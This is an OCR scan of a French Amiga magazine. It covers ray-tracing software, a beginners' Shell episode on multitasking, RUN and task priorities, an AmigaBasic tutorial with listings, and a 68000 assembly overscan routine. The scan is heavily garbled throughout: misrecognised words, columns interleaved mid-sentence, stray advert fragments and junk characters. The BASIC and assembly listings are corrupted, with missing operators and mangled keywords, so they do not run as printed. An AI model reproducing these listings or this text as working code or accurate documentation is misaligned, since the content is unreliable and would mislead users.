Sculpt 4D et DBW-Render utilisent le Ray Tracing pour générer des images d’un réalisme impressionnant avec les 4096 couleurs du mode HAM de l’AMlGA. BiensÛr, le temps de calcul d'une image comportant plusieurs objets peut être de plusieurs heures, voire de plusieurs jours! C'est pourquoi ces programmes permettent d'effectuer des tests sur des images de petit format avant d'attaquer la haute résolution. Sculpt 4D offre également d’autres types de représentation, comme le Z-buffer ou le fil de fer (une version spéciale du programme peut travailler avec un circuit d'extension comprenant un
processeur plus rapide et un coprocesseur mathématique pouvant réduire de 10 à 100 fois les temps de calcul).
Un dernier élément permettant d'approcher encore plus le réalisme est l'utilisation de textures: il s’agit d'un motif de pixels destiné à remplir une surface donnée et conçu pour suggérer visuellement la nature de cette surface (bois, métal, tissus, etc..). L'image finale est obtenue en juxtaposant ces motifs élémentaires de manière à recouvrir entièrement les objets de la scène. DBW-Render offre le choix entre une infinité de textures car il peut utiliser tous les motifs dessinés ou digitalisés (au format IFF).
SCULPTEUR ET PEINTRE U n’y a pas si longtemps, nous ne pouvions que rêver devant les images de synthèse que nous voyions quotidiennement à la télévision et au cinéma Maintenant, en nous armant d’un peu de courage, de beaucoup de patience et d'un Amiga, nous pouvons tous réaliser notre propre dessin animé sur ordinateur à partir d’un univers totalement imaginaire.
ZORGLUB SHELL POUR DEBUTANTS Depuis la dernière fois, vous avez eu largement le temps de sortir de la caverne SCRIPT où çà commençait à manquer d'air.
Notre exploration d’aujourd’hui va nous donner, ceci dit sans l’ombre de la moindre trace de sectarisme, une raison de plus d’être satisfaits d'avoir choisi l'Amiga, laquelle bécane, fût-elle un simple " Amiga 500, nous offre à un prix incroyablement bas des possibilités que l’on ne trouve que sur des machines considérablement plus chères.
L'Amiga est en effet capable de fonctionner en multitâche.
Kekseksa? Cela veut dire qu'il est capable d’exécuter simultanément plusieurs tâches à la fois, du moins en apparence, car en fait - mais ceci est vrai même sur les miniordinateurs, les stations de travail et beaucoup de machines moyennes et grosses - il va distribuer le temps disponible de son processeur en profitant de ce que l'exécution de certaines phases de certaines tâches lui laissent une paix royale.
Prenons un exemple: lorsque je tape au clavier (je suis affreusement lent mais nous allons voir que c’est sans conséquence dans le cas présent), j'envoie à la machine quelques signaux par seconde (cela pourrait être quelques dizaines, ce serait toujours très lent). Chaque fois que je frappe une touche, le microprocesseur reconnaît la touche frappée, identifie le caractère, détermine ses coordonnées, l’ajoute au texte, l’envoie à l’écran, puis avance le curseur d’un cran.
Mais tout ceci ne lui prend que très peu de temps, je ne sais pas précisément combien, mais au pire çà ne dépasse pas quelques millièmes de seconde. En plus, comme 10e épisode: Le Multitâche l'Amiga a un co-processeur graphique, le processeur principal est même déchargé d'une partie de ce travail. Alors, le reste du temps, ce processeur principal est disponible et attend qu'on lui donne quelque chose à faire.
Un ordinateur multitâche contient donc un système de gestion des lâches qui lui permet, pendant les temps libres de l’exécution d'une tâche, d’aller voir s’il ne peut pas faire avancer les autres. Comment il le fait n’entre absolument pas dans le cadre de cette série d'articles.
Deux ou trois remarques toutefois:
- un PC, fût-il de type AT, est monotâche. Ce n’est pas parce
qu'on peut ouvrir plusieurs fenêtres sous WINDOWS par exemple,
que les programmes correspondant à ces fenêtres tournent en
même temps.
Il sont tous en attente, seul tourne celui dont la fenêtre est excitée. Ce n'est pas non plus parce qu'un peut faire certaines choses pendant que l’imprimante fonctionne, que l'on fait du multitâche; il se fait que certaines imprimantes ont une mémoire-tampon de bonne taille (par exemple une DeskJet peut avoir 128 K de mémoire interne); si le document à imprimer y entre en entier, le système peut reprendre la main immédiatement, tandis que l’imprimante travaillera encore plusieurs minutes. Pour qu'un PC tourne en multitâche, il faut qu’il puisse fonctionner sous UNIX par exemple.
- la plupart des jeux commerciaux ne fonctionnent pas en
multitâche, pour la raison qu'il s’agit de ” portages ” sur
l'Amiga de programmes écrits pour des machines monotâches. Pour
qu'un programme soit exécutable en multitâche, il faut,
lorsqu'on l'appelle, qu'il puisse aller se charger en mémoire
là où il y a de la place, et l'emplacement libre dépend de ce
qui tourne sur la machine au moment où on appelle le programme.
Un programme fait pour une machine monolâche va toujours se
loger au même endroit de la mémoire, cela simplifie grandement
les problèmes d'adressage et la programmation. C'est pourquoi
la plupart des programmes de jeux commerciaux obligent à
redémarrer la machine. Dans le cas d'une machine monolâche,
c'est un mal indispensable; dans le cas d’une machine
multitâche comme l'Amiga, c'est irritant. Le contraste est
flagrant avec la plupart des jeux du domaine public, souvent
moins impressionnants au niveau du graphisme, mais écrits par
des gens qui connaissent la machine, et qui savent faire le
ménage en mémoire quand on quitte le jeu. On peut faire un
Tiles ou un Tetrix pendant que çà télécharge par exemple. Il
faut dire que les Bon, assez causé, au travail.
Le multitâche fonctionne parfaitement à partir du Workbcnch et des icônes, mais ici on ne parle que de SHELL.
Comme d'habitude, je suppose que nous ne disposons " que " d'un AMIGA avec un seul lecteur de disquettes et sans disque dur. Pas d'imprimante non plus, nous ne sommes que 52,15% à en avoir une (source de cette information: enquête publiée par Commodore Revue).
Nous démarrons le système avec notre copie de travail de la disquette Workbcnch
1. 3, nous cliquons dans l'icône du SHELL, et nous voilà chez
nous;
l. WB1.3 commençons par copier la commande COPY en ram:
l. WB1.3 copy c:copy ram: insérons la disquette Extras, et
faisons
l. WB1.3 ram:copy dfO:tools perfmon ram:
l. WB1.3 ram:copy dfO:tools palette ram:
- un système multitâche utilise le temps disponible au cours de
l’exécution d'une tâche pour s'occuper d'une autre, encore
faut-il qu’il y ait du temps libre. Un programme de calcul
d'image (Mandelbrot ou ray-tracing), fait mouliner le
processeur à plein temps. Il faut donc qu'il y ail un système
de gestion des priorités qui évite l’accaparement de la machine
par un programme goulu. Lorsque deux tâches ont la même
priorité, l'AmigaDos partage le temps du processeur entre les
deux tâches.
- enfin, plus il y a de tâches en fonctionnement en même temps,
plus le temps de réponse s’allonge, et plus chacune d'elles
semble d'exécuter lentement.
Il en va exactement de même sur les ordinateurs de gestion dans les entreprises, il y a des heures où tout le monde travaille et auxquelles le système ne répond que très lentement. C’est pourquoi les tâches très intensives en occupation de l'unité centrale sont effectuées la nuit. Sur l'Amiga, c'est la même chose, la plupart des images en 3 dimensions et multicolores seront calculées la nuit, où à tout autre moment où l'heureux propriétaire de la machine en est séparé.
Jeux à animation rapide s'accomodcnt par définition mal d’un partage du temps du processeur, l'animation devenant saccadée.
Remettons notre disquette WB13 dans le lecteur. Faisons:
l. WB1.3 newshell réduisons un peu la hauteur de nos deux
fenêtres, plaçons-les l'une au-dessus de l’autre, puis
appellons-en une troisième
l. WB1.3 newshell cl plaçons-la dans le bas de l’écran.
Cliquons dans la première fenêtre, et faisons
1. WB1.3 ram:perfmon dans PerfMon il y a un menu, choisissons
un intervalle de 0.5 seconde, puis ajustons la taille et la
place de la fenêtre à notre meilleure convenance. Dans la
moitié du haut, une courbe nous donne le temps libre du
processeur (idle signifie inactif, c’est aussi le terme quui
désigne le ralenti d'un moteur). Laissons les choses se
calmer, et comme le processeur n’a plus rien à faire (sur
l'Amiga, le rafraîchissement de l’écran est fait par un
co-processeur), la courbe est plate et dans le haut de la
fenêtre. Dans la moitié du bas, nous voyons la mémoire " chip
" disponible; c’est celle qui est accessible directement par
le coprocesseur graphique; un chiffre en bas nous indique ce
qui reste de mémoire " normale ", dite " fast ram ", Ce n’est
pas parce que j'ai dit, cl nous le vérifierons encore cette
fois, que PerfMon est un programme " mal élevé " qu’il n'est
pas utile ; il est même très intéressant.
Cliquons dans la deuxième fenêtre SHELL et faisons:
2. WB1.3 ram:palette Nous voyons apparaître une charmante lucame
avec des curseurs qui nous permettent de changer à volonté
les couleurs de l’écran.
Remarquons qu'à présent, nous pouvons taper ce que nous voulons dans une des deux premières fenêtres SHELL, sans aucun effet. Ces fenêtres sont bloquées par le programme qu’elles ont lancé.
Cliquons dans la fenêtre 3 et, poùr avoir quelque chose qui mette un peu de temps à s’exécuter, tapons:
3. WB1.3 dir dfO: opta Observons grâce à PerfMon ce qui se
passe: La troisième tâche sollicite un peu le processeur,
PerfMon ne consomme pas beaucoup de temps, puisqu’il fait deux
mesures à la seconde; quant à Palette, il ne consomme rien
tant qu’on ne touche pas aux curseurs.
La tâche 3 étant finie, relançons-la, puis attrapons avec la souris le curseur de la composante bleue dans Palette et déplaçons- le constamment de droite à gauche et de gauche à droite, sur toute sa course.
D’un oeil, observons sur PerfMon l'augmentation de l’occupation du processeur, de l'autre l'impact de ces manipulations sur la vitesse d’exécution de la tâche n' 3.
Tant que nous y sommes, jouons avec les priorités.
Nos trois SHELL ont été ouverts avec la priorité par défaut, qui est 0 . Les priorités peuvent être fixées entre -128 et +127, par la commande CHANGETASKPRI.
Dans notre fenêtre 3, faisons
3. WB1.3 ede
3. WB1.3:c dir et pendant que la commande s’exécute, balançons
comme précédemment un curseur dans Palette. Nous observons
deux phases de fonctionnement: tant que le système lit le
contenu du répertoire c sur le disque, le changement de
couleur de l'écran suit instantanément le mouvement de la
souris. Ceci parce que l’accès au disque est en partie
l'affaire d'un des coprocesseurs de l'Amiga, et le processeur
principal a du temps pour exécuter les ordres reçus de Palette
et en plus, deux fois par seconde, faire une mesure avec
PerfMon; dès que l’accès disque est terminé, on voit
immédiatement que le changement de couleur se fait par
saccades, de même que l'affichage dans la troisième fenêtre
SHELL.
Il y a partage équitable entre les tâches.
Faisons maintenant, dans la troisième fenêtre
3. WB 1.3:c changetaskpri 2 et recommençons la manip. Cette fois
nous constatons que Palette et PerfMon sont bloqués pendant
toute la durée de l’affichage du contenu de c, qui
s’effectue, lui. à vitesse normale.
Incidemment, PerfMon est lancé d'office avec une priorité de -100, pour ne gêner personne.
Si nous souhaitions rédiger un texte pendant que le système calcule une image, sans être gêné dans notre vitesse de frappe, nous donnerions à la fenêtre à partir de laquelle nous avons lancé notre traitement de texte une priorité 2 par exemple. De cette manière, nous ne nous apercevrons absolument pas de l’activité de l’autre programme, qui par contre se remettra à utiliser toutes les ressources du processeur chaque fois que nous irons faire pipi ou boire un Burp Fraise.
Bon, n’importe quel AMIGAïdc avec un peu d'expérience du SHELL va se marrer doucement en voyant nos trois fenêtres CLI, et par-dessus, les fenêtres de Palette et de PerfMon. En effet, c'est vachement encombré et çà fait désordre. Je l’entends déjà ricaner: " et la commande RUN, çà sert à quoi? ". Justement, on y vient. Y a comme çà des coïncidences heureuses.
D’abord, le ménage. La troisième fenêtre se ferme en faisant
3. WB1.3:» endshell et çà marche.
Comme les deux autres ne veulent rien entendre, nous cliquons dans le point en haut à gauche du cadre de PerfMon, dans OK de Palette, après quoi on peut fermer la fenêtre 2 par ENDSHELL et garder tout de même la fenêtre 1.
Entrée en scène de RUN Faisons
l. WB1.3 run ram:perfmon Perfmon apparaît, mais nous voyons
aussi [shell 2]
l. WB1.3 Pas mal, nous pouvons de nouveau travailler dans
notre fenêtre 1; PerfMon, quant à lui, est géré par une tâche
SHELL n' 2, mais en arrière-plan, sans fenêtre. Continuons
l. WB1.3 run ram:palette Même chose.
Tant qu'on y est:
l. WB1.3 run dir dfO: opt a [shell 4] rien...... puis notre
affichage qui commence, mais pas question de réutiliser notre
fenêtre SHELL avant que la commande dir opt a n’ait fini son
boulot. Pourquoi?
Simplement parce qu'on ne peut pas demander à un programme de s'exécuter en arrière-plan, alors qu'il a besoin d’une fenêtre SHELL pour s'exprimer! PerfMon et Palette ouvrent leur propre fenêtre; une commande comme dir: s'exécute normalement dans une fenêtre SHELL. Il en aurait été autrement si nous avions fait
l. WB1.3 dir prt: dfO: opt a ou, puisque nous n’avons pas
d'imprimante:
l. WB1.3 dir ram:toto dfO: opt a Nous voyons donc que nous
pouvons lancer " en arrière-plan " par RUN, à partir d'une
seule fenêtre SHELL, toute une série de programmes qui vont
fonctionner simultanément, avec les restrictions de temps de
réponse dont nous avons parlé.
Par exemple, si on veut jouer à Tetrix en téléchargeant, on constate que les figures tombent par saccades. On peut évidemment privilégier Tetrix, au détriment de la note de téléphone, celà dépend de la relation que l’on a avec celui qui paie la note.
Erreur !!!!
Le grand Zorglub s'est encore planté.
Çà devient une habitude, heureusement qu'on arrive à la fin de la série. Un lecteur qui a essayé de reproduire les exemples donnés dans l'aricle du n' 18, page 20 (héhé, il y en a donc au moins un qui l’a lu!) Me signale que la syntaxe donnée dans les exemples pour les commandes SORT et SEARCH ne marche pas avec les commandes de WB1.3. C'est absolument exact !
En fait, j'ai sur mon disque dur deux répertoires C, l'un avec les commandes du WB1.3, que j'utilise pour tester mes exemples, l'autre avec les commandes de la bibliothèque ARP. Je me suis mélangé les crayons. En fait les exemples marchent avec les commandes ARP; la commande SEARCH de WB1.3 est absolument incapable de faire ce que je veux lui faire faire dans ces exemples; quant à la syntaxe de SORT version WB1.3, voici ce qu'elle aurait dû être: sort ram liste ram: ordonnée.
Voilà, avec mes plates excuses et un grand merci au deepien HELGE.
Courage, on a presque fini.
Je fais le ménage, et je recommence:
l. WB1.3 run ram:perfmon [shell 2]
l. WB1.3 endshell shell 1 ending et qu'est-ce que je m’aperçois
(comme disait un prof de l’un de mes enfants)?
Plus rien! Le SHELL à partir duquel j'ai fait RUN s'est bien refermé, mais comme il y a toujours PcrfMon qui tourne sous le SHELL n"2, pas moyen de fermer la fenêtre.
Çà, c'est embêtant, car imaginez qu'une commande run sysrutilities perfmon (j'imagine que vous avez mis PerfMon dans le tiroir Utilities plutôt que dans ram: car dans ce dernier cas ce qui suit n'a pas de sens! Un redémarrage vide ram:) fasse partie de la séquence de démarrage du système : plus moyen de refermer le CLI (rappelons-nous que la séquence de démarrage part d'un CLI ouvert sans notre intervention) et donc impossibilité de faire apparaître l'éaran du Workbcnch.
Si vous examinez le fichier Startup- Sequence du répertoire s:, vous verrez qu’il se termine par load wb (charger le WorkBench) endeli nil: (refermer le CLI) il faudra donc, si nous voulons lancer au cours de notre séquence de démarrage des programmes mal élévés comme Perfmon (j'appelle mal élévés des programmes qui gardent un tâche SHELL bloquée), faire autre chose.
L’AmigaDos propose d’utiliser dans ce cas la syntaxe run nil: nomdeprogramme ce qui marche dans un certain nombre de cas. L'idée est que l'unité logique NIL: se comporte comme un trou noir qui engloutit tout ce qu’on verse dedans. Si le programme avait l'idée saugrenue de vouloir encore envoyer quelque chose à la fenêtre SHELL après avoir été lancé, en redirigeant cette sortie vers NIL:, on supprime le besoin de la fenêtre SHELL et elle se débloque.
Si nous faisons WB1.3 run nil: utilities perfmon nous constatons qu'après le démarrage de PcrfMon, nous pouvons refermer la fenêtre SHELL par endshell; PcrfMon s'est " détaché " du SHELL et fonctionne en tant qu'une lâche donnée.
De ce point de vue, PcrfMon n'est qu'à moitié mal élévé, car, pour des raisons relativement compliquées à expliquer, çà ne marche pas avec tous les programmes; pour trouver une solution générale, il faudra recourir à la commande RUNBACK du domaine public. On en trouve la dernière version sur FISII 214, ainsi qu’une explication remarquablement claire de Matt Dillon sur les raisons de l'échec occasionnel de la syntaxe run nil: Voilà, c’était le dernier épisode de notre épopée dans les cavernes de l'AmigaDos.
Vous aurez tout de même droit à un dernier " SHELL POUR DEBUTANTS " dans le prochain numéro, car nous y verrons comment, par une bonne combinaison de programmes empruntés au domaine public, nous allons transformer T environnement du SHELL et donner à notre Amiga l'interface utilisateur conviviale qu'il mérite.
Par ailleurs, il y a bien sûr dans cette série des points qui n'ont pas été traités, et certaines questions laissées sans réponse.
Ecrivez-nous à la revue, il nous est tout-à- fait possible de continuer une série d'articles sur T utilisation de T Amigados, mais tant qu'à faire, il vaudrait mieux que son contenu corresponde à vos besoins.
- Zorglub
j. ÿg-.W»' TITUS 28 TER AVENUE DE VERSAILLES - 93220 GAGNY TÉL. :
(1) 43.32.10.92 AMIGA 2eme édition. (Workbench 1.3) et bien
exploiter Yves BRAZEAU Daniel GARANT Editions * * SSÜS
,p.ou£ nET ?H INTRODUCTION AÜ THF™ Je disais précédemment que
l'atout c'est la structure. Je vais préciser pour vous. Quand
vous écrivez un programme, il n est pas rare de voir
apparaître sur la ligne de la fenêtre, un message d’erreur.
Vous pouvez utiliser le mode TRACE ou STEP afin de suivre pas
à pas votre programme et ainsi découvrir l’erreur. Ce basic
est dit structuré car sans numéro de ligne mais aussi, des
commandes qui vous per- metent de visualiser correctement
votre programme A côté de la commande normale comme FOR-NEXT
on trouve aussi IF-THEN-ELSE, END-IF et WHILE-WEND.
Une aide innestimable vous est apportée par ON ERROR GOTO pour intercepter et tester les erreurs, ON BREAK GOSUB qui lors d une interruption du programme vous permet défaire appel à un sous-programme de même que les possibilités qu'offre ON TIMER(n) GOSUB toutes les n secondes fait appel â un sous- programme.
D’ailleurs le voici ce listing tout simple et assez explicite (listing 1).
L'AmigaBasic, comme l'Ami ga Dos, ne fait pas vraiment de différence entre fichiers et périphériques.
Autant pour la réponse de la louche gauche de la souris (touche de choix) que pour celle de droite (touche du menu), le basic de l’Amiga tient des fonctions à votre disposition pour utiliser l’environnement d "Intuition". Les commandes MOUSE et MENU correspondent à celte définition. C'est grâce à ces instructions qu’il vous est possible d’utiliser avec des programmes basic cet environnement et de donner un aspect professionnel.
C'est un réel avantage, car l’accès et possible avec la même syntaxe pour les enlrées-sorlies.
Le basic a à sa disposition DFO, DF1, DF2, DF3 et RAM (disque virtuel). SER et COM1 pour la sortie série et PAR, PRT et LPT1 pour la sortie parallèle. Notez que la série a deux noms et la sortie parallèle en a même trois.
La raison c’est que l’AmigaBa- sic utilise ces sorties indifférem- REM Utilisation simple de menus MENU 1,0,1,"Menu 1" MENU 2,0,1,"Menu 2" FOR i=l to 3 MENU l,i,l,"Premier point ”+CHRS(48+i) MENU 2,i,l,"Deuxièmepoint ”+CHRS(48+i) NEXT i MENU 1,4,1,"Fin... ’’ Fin=0 ON MENU GOSUB Choix MENU ON WHILE Fin=0:WEND MENU RESET END Choix: m%=MENU(0):p%=MENU(l) LOCATE 10.1 PRINT "Menu ”+CHR$ (48+m%) PRINT "Point numéro ”+CHR$ (48+p%) IF m%=l AND p%=4 THEN Fin=l RETURN (listing 1) PARTIE 1 (Graphiques): Tracer des points, des lignes, des ¦motifs et réaliser des déplacements des parties; fd'écran PARTIE 2
(Animation son)!,.
Déplacement d'objets à l'écran 1; utilisation du son PARTIE 3 ( La Programmation structurée): Apprendre à utiliser les boucles, IF... THEN... ELSEi WHILE... WEND, et aspect visuel de vos programmes PARTIE 4 (Les interruptions):!
Interception des erreurs de programmation ; interruption par menu, timer ou souris PARTIE 5 (Sous-programmes et librairies): La technique des sous-programmes ; insertion de programmes en langage!
Machine et des librairies.!
Ment. Donc pour la sortie PRT de même que pour LPT1 vous ne pouvez transmettre que vers une imprimante choisie dans le menu "préférences".
La raison provient d'une certaine compatibilité face à d’autres dialectes basic : dans son développement du basic, Microsoft a utilisé LPT1 pour définir la sortie imprimante (voir GW-BASIC sous MS- DOS). La seule différence entre PRT et LPT1, c’est que LPT1 imprime immédiatement pendant que PRT utilise un buffer.
Les raisons sont les mêmes que pour SER et COM1, ce dernier permet de fixer des paramètres (Baud, parité, etc...). Il existe deux possibilitées pour traiter des fichiers : le séquenciel et ,l’accès direct.
Après l’ouverture du fichier avec son option ("O" écriture séquentielle, "A" ajouter à un fichier séquentiel, ”1” lecture séquentielle et "R" accès direct en lecture écriture) vous pouvez intervenir dans un fichier séquentiel avec WRITE , PRINT et INPUT .
L’équivalent pour l’accès direct c’est G ET , PUT , RSET et LSET. Mais cette fois- ci je ne céderais pas à l’envie de vous en dire plus et je ne poursuivrais donc pas ce domaine d'accès aux fichiers. Cela nous entraînerait bien trop loin.
Avec toutes ces premières instructions il ne faut pas oublier les principales, a savoir les commandes de chargement et de sauvegarde des programmes que vous allez élaborer. Je vous signale qu’à partir du basic de l'Amiga on peut accéder à d’autres programmes basic qui ne sont pas dans le même répertoire en utilisant la commande CHDIR (change dir) et pour voir quels sont les fichiers disponibles on utilise la commande FILES. Hum! J'ai encore un petit truc qui me trotte dans la tête à ce sujet. Moi ca m’embêtait de ne pas pouvoir disposer de tous ces formidables fichiers que j’avais à portée
de main et que j’utilise sous cli.
L’instruction FILES, quel navet face à l’instruction LIST qui se trouve dans le répertoire C de votre disquette! Alors je vais vous écrire un programme basic qui permet d'utiliser tout ce qui se trouve sur votre disquette sans quitter votre application basic. C'est-à-dire : vous restez sous basic.
Donc je vais vous... Héhé !
Me voilà encore parti vers des horizons de programmation. Ce programme je l’ai déjà fait; vous pensez bien que je n’allais pas attendre. Avant de vous le donner, je le garde encore un peu au chaud car il va me servir à vous expliquer comment faire avec ces fichiers bizarres qui ont une extension .bmap (c’est des librairies). Bon je vous parlais des commandes basic pour les fichiers. Si vous regardez bien vous verrez deux fichiers avec un même nom mais l’un est affublé d’une extension ".info" qui contient des informations sur le programme basic et surtout 1’ "Icon", ce petit graphique qui
vous permet l'utilisation de programmes sous Workbench.
La grande différence avec les(?)
Versions antérieures à l’Amiga- Basic 1.2 c’est la commande pour effacer (KILL) et celle pour renommer (NAME) un fichier. Elles sont toutes les deux opérantes sur les deux fichiers du programme (NomDuProgramme et NomDuProgramme.info). Donc oublions ce qu’il y avait avant... Il y a cinq types différents de variables : simple précision, double précision, entier de type court, entier de type long et les chaînes de variables. On pourrait être amené à en reparler... Arrivons au son. Paraît que l’Amiga est musicien... Mais avant un autre petit listing(2) pour vous bande de veinards Le listing (3)
qui accompagne ces explications devrait vous donner une idée des possibilités quant à la programmation du son sur l'Amiga oui mais... Nous verrons ça quelques lignes plus loin. Nous avons deux commandes pour faire parler l’Amiga : TRANSLATE et SAY.
Avec ça vous pouvez faire lire des phrases (en anglais). Avec un petit effort on pourrait s’attacher à faire parler notre ordinateur en français. Enfin !
Pour faire du son on utilise la commande SOUND, plutôt que de faire de nombreuses phrases (à moins que vous ne préféreriez lire du texte) je vous écris , là, tout de suite et même immédiatement un petit programme.
Et c’est là ou les Athéniens C'est le mais de tout à l’heure. Je vous rend donc attentif à ce qui va suivre (il y a tant de choses inexpliquées...). La commande WAVE que vous pouvez voir dans le programme ci-dessus vous donne la forme de l’onde. La fonction SOUND permet de synchroniser les différents canaux parce qu’il y a d’abord une file d’attente.
Ce principe de file d’attente est très intéressant et se trouve surtout mis en évidence sous Pascal autre langage de programmation structuré. C’est pourquoi on commence dans un programme de son par la commande SOUND WHITE et après seulement SOUND pour les différents canaux. D ne faut toutefois pas oublier que la commande SOUND utilise beaucoup de place mémoire.
Je reviens donc au principe du programme listing 3. Il fonctionne sans problème mais si on redémarre avec la commande RUN il reste accroché sans listing 2 : salut aux matheux'.
REM Eratosthène n=5000 temps-TlMER DIM premier%(5000) FOR i=2 TO 2500 IF prcmicr%(i)=0 THEN j=i+i WHILE j = 5000 premier%(j)=l j=j+i WEND END IF NEXTi TempsPassé=TIM ER-temps FOR i=2 TO 5000 IF premier%(i)=0 THEN PRINTi NEXTi temps=TIMER-tcmps PRINT TempsPassé,temps END Listing 3. Démo pour son et graphique.
REM Coucou Décroche CLStCLEAR DIM coucou%(255) FOR i=0 TO 255 coucou%(i)=INT(255*RND-128) NEXTi WAVE 0,coucou%:WAVE l,coucou% WAVE 2,coucou%:WAVE 3,coucou% PSET(10,90-3*coucou%(0) 4) FOR i=l to 255 ’ LINE-(10+124 54*i,90-3*coucou%(i) 4) NEXTi FOR i%=440 tTO 880 STEP 5 LOCATE 1,1:PRINT i%:LOCATE 1,10 PRINT FRE(-2),FRE(-1),FRE(0) SOUND WAIT SOUND i%,5,150,1 SOUND i% 2,5,175,0 SOUND i%*2,5,125,2 SOUND i%*4,5,100,3 SOUND RESUME NEXTi END Listing 4. Le dessin d’une bille.
REM Bille définition 320 x 400 REM en 32 couleurs SCREEN 1,320,400,5,3 WINDOW 2,,,Bille"„31,3 WINDOW OUTPUT 2 PALETTE 0,.2,.3,1 : REM couleur ' ’ arrière plan FOR i = 1 TO 31 col = i 31 PALETTE i,l,col,col : REM couleurs x = 150 + 1.5 * i y = 200-2 *i r = 180 - 5.5 * i CIRCLE (x,y),r,i,„1.75 PAINT (x,y)4 NEXTi END C’est dans les fonctions graphiques que l’on voit la véritable puissance du basic de l’Amiga. Les instructions sont simples et confortables à utiliser et l’on peut fabriquer des graphiques complexes. Dans le listing 3, non seulement vous avez pu voir la programmation simple
de son mais aussi la représentation graphique de la forme d’onde. La commande LINE est plus importante qu'il n’y paraît. Elle peut tracer des lignes mais aussi des quadrilatères. A côté de cela nous avons PSET et PRESET qui permettent de placer un point, pour faire des élipses CIRCLE pour dessiner AREA et pour mettre en couleur des formes fermées AREAFILL.
PAINT rempli une surface avec la couleur de votre choix, tandis que PATTERN décide des motifs à utiliser pour cette mise en couleur.
Afficher de fenêtre d'erreur (on peut l’arrêter avec STOP). Qui me dira pourquoi ?
Quatre couleurs sont installées et si l'on veut utiliser une palette plus importante, il faut ouvrir un nouvel écran avec la commande SCREEN où les paramètres qui suivent représentent le mode et le nombre de byteplanes (de un à cinq).
Le nombre de couleur se calcule par deux puissances nombre de byteplanes ; vous pouvez donc sur un écran avoir au maximum trente deux couleurs. Pour le choix de ces couleurs, vous utilisez la commande PALETTE.
Les numéros de couleur vont de zéro à trente et un et sont mis au point avec des valeurs décimales comprises entre zéro et un pour RGB (Rouge Vert Bleu).
Les commandes GET et PUT sont d’une aide remarquable car elles lisent les représentations graphiques de l’écran en les mettant dans un seul champs. Le défaut principal de l’AmigaBasic c’est qu’il ne reconnait pas les images en 1FF, car il avait été développé avant ce standard. Le listing 4 vous montre la simplicité avec laquelle on confectionne des images. Il est certain que l'on s ennuie très vite à voir une image fixe alors il y a les commandes OBJECT qui anime l’écran. Il y a deux sortes d’objets : les bobs et les sprites. La différence entre les deux est le nombre de couleur, la taille
maximale et la rapidité avec laquelle ils peuvent se déplacer.
Comme vous trouvez un programme qui s’appelc OBJED1TE sur votre disquette, on ne se pose pas le problème du choix des deux.
L’Amiga connait trois sortes de sous-programmes : les fonctions représentées par DEF FN et appelée par FN. Une fonction ne peut comporter qu’un calcul et qu’une ligne unique. Le plus intéressant maintenant c’est les sous-routines. La sous-routine est formée d’un label et se termine par RETURN. Toutes les variables utilisées dans les sous-routines sont globales, c’est-à-dire que les variables sont reconnues autant que par le sous-programme que par le programme principale. On appelé la sous-routine avec la commande GOSUB. C'est là le plus grand intérêt du basic de l’Amiga plutôt qu’un long
discours, un exemple !
Admettons que dans le programme principal on affecte à une variable x la valeur 1 ; en même temps, nous avons dans un vrai sous-programme une variable x = 2 ; si nous demandons au programme principal PRINT x, nous avons la valeur 1, par contre, dans le sous- programme PRINT x sera égal à
2. Résultat : nous pouvons chaîner des programmes venant de
différents horizons. Et nous voila dans les librairies, car en
réalité les librairies ne sont qu'une collection de
sous-programmes.
RAPIDO ASSEMBLEUR Les sous-programmes ne doivent pas être obligatoirement écrits en basic mais peuvent aussi utiliser le langage machine. Vous avez même la possibilité d'appeler les routines système, il est évident que vous devez connaître les paramètres qu’elles utilisent. Un inconvénient du système d’exploitation, c’est qu’il est écrit en C, et que le C utilise une autre méthode pour transmettre des paramètres. Mais il existe un programme qui s’ap- pclc "Convertfd" sur la disquette du basic. Il permet une conversion des librairies en librairies basic avec une extension .bmap. Dans le N°
17 nous avions vu comment on pouvait faire, simplement, de l'overscan sous intuition. Hélas il manquait la possibilité de bouger le pointeur jusqu'au bord vers la droite et le bas de T écran.
Réjouissez vous car grâce à A-News vous allez pouvoir, enfin, accéder jusqu aux bords extrêmes. Il suffit de rajouter, en tête du programme les quelques lignes suivantes : ? Eft ©DÛ 2®nndliiDsn©iniooo wwroaM.w -11 w . ¦ .3 L’AmigaBasic peut être un langage renversant ! Mais les spécialistes ne voudront pas passer leur temps à résoudre des problèmes basic vu l’extrême lenteur de l’interpréteur. II est évident qu’à ce niveau il est plus intéressant de faire du langage machine ou d'utiliser un compilateur. 11 existe un compilateur pour le basic de l'Amiga.
Face à tous les langages, surtout ceux que je connais, je retiendrais le basic comme une méthode, une approche simple, qui convient le plus souvent à des personnes non familiarisées avec un raisonnement, une forme de penser que véhicule l'informatique. Le basic de l’Amiga me rappelle un autre langage du nom de Pascal qui utilise aussi des structures.
Si vous n’avez pas compris quelque chose, remettez vous à l’ouvrage et persévérez. Si vous avez des objections, un problème au sujet de cette scrie en BASIC, écrivez à A-News qui transmettra. J'cssairais d’aborder les diverses questions qui pourrons m’être posées.
A Lire TRUCS ET ASTUCES, LE GRAND LIVRE DU BASIC, CLEF POUR L'AMIGA, et d’autres... Sur ce, je vous dis a + CRS RemakcDisplay cqu 384 Forbid cqu -132 Permit equ -138 MaxX cqu 704 MaxY equ 588 Puis dans la liste de variables, par exemple après le dseg : orig_maxx: dc.w 0 orig_maxy: dc.w 0 Enfin faire un bsr à Chan- gelnluition avant d’ouvrir l’écran et un bsr à Resti- tuelntuition avant de le refermer.
Changelntuition: ;sauver MaxXMousc movc.lIntuiBase,aO movc.w82(a0),orig_maxx ;sauver MaxYMousc movc.w86(a0),orig_maxy ; arrêter le multitâche move.l ExecBase.aô jsr Forbid(aô) ;MaxXMouse =MaxX move.lIntuiBase.aO movc.w MaxX,82(aO) ;MaxYMouse =MaxY movc.w MaxY,86(aO) ;MaxDisplayWidth =MaxX move.w MaxX,1350(a0) ;MaxDisplayRow = MaxY; move. W Max Y, 1348(a0) ;MaxDisplayHeight = Max- DisplayRow + 1 movc.w MaxY,dO add.w l,dO move. WdO, 1346(a0) move.l ExccBase.aô jsr Pcrmit(a6) move.l IntuiBase.aô jsr RcmakeDisplay(aô) rts Rcstituelntuition: move.l ExecBase.aô jsr Forbid(aô)
• .MaxXMouse =orig_maxx move.lIntuiBase.aO move.worig_maxx,82(a0)
;MaxYMouse =orig_maxy move.worig_maxy,86(a0) ;MaxDisplayWidth
=orig_maxx move. Worig_maxx, 1350(a0) ;MaxDisplayRow =
orig_maxy move. Worig_maxy, 1348(a0) ;MaxDisplayHeight =
